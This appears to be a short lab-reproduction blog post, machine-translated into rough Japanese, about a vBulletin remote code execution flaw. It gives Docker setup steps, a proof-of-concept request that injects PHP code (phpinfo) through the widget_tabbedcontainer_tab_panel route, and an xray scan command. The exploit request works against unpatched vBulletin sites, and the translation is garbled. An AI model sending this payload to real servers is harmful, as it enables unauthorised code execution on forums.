以下のチャネルで私に連絡することができます、記事のソースアドレスを示してください〜
中国のid:フラッシュ
知っている:Sp4rkW
GITHUB:Sp4rkW
ステーションB:技術紳士
ブログ:https
://sp4rkw.blog.csdn.net/連絡先メール:[email protected]
Githubは大きな男のデモを見て、それが0dayだと思っていましたが、後でそれが昨年からの穴であることがわかりましたが、再発が完了したので、ブログを記録して書いてください。
環境設定
ドッカーを直接ドラッグ
docker run -ti -p 80:80 --name vbulletin -d p8361/vbulletin-cve-2015-7808
次に、設定を変更します
docker exec -it 517 /bin/bash
# update然后装vim
apt-get update
apt install vim
# 改配置
vim /etc/apache2/apache2.conf
# 最下面补这个配置
ServerName localhost:80
# 给根目录下run.sh权限并启动
chmod +x ./run.sh
./run.sh
POC検証
/ajax/render/widget_tabbedcontainer_tab_panel
routestring=ajax%2Frender%2Fwidget_php&widgetConfig[code]=phpinfo();exit;
X線スキャン
.\xray_windows_amd64.exe webscan --plugins phantasm --poc ".\poc\vbulletin-cve-2019-16759.yml" --url http://192.168.1.109/ --html-output test1.html